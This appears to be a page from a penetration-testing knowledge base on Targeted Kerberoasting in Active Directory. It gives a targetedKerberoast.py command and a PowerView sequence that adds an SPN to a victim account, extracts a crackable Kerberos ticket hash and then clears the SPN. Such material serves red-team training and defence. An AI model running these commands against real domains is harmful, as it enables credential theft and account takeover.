Targeted Kerberoasting
This abuse can be carried out when controlling an object that has WriteProperty, GenericWrite or GenericAll over a target user (i.e. member of the Account Operator group).
The attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting.
UNIX-like
Windows
From UNIX-like systems, this can be done with targetedKerberoast.py (Python)
1
targetedKerberoast.py -v -d $DOMAIN_FQDN -u $USER -p $PASSWORD
Copied!
From Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module).
1
# Make sur that the target account has no SPN
2
Get-DomainUser 'victimuser' | Select serviceprincipalname
3
โ€‹
4
# Set the SPN
5
Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
6
โ€‹
7
# Obtain a kerberoast hash
8
$User = Get-DomainUser 'victimuser'
9
$User | Get-DomainSPNTicket | fl
10
โ€‹
11
# Clear the SPNs of the target account
12
$User | Select serviceprincipalname
13
Set-DomainObject -Identity victimuser -Clear serviceprincipalname
Copied!
Once the Kerberoast hash is obtained, it can possibly be cracked to recover the account's password if the password used is weak enough.
Last modified 2mo ago
Copy link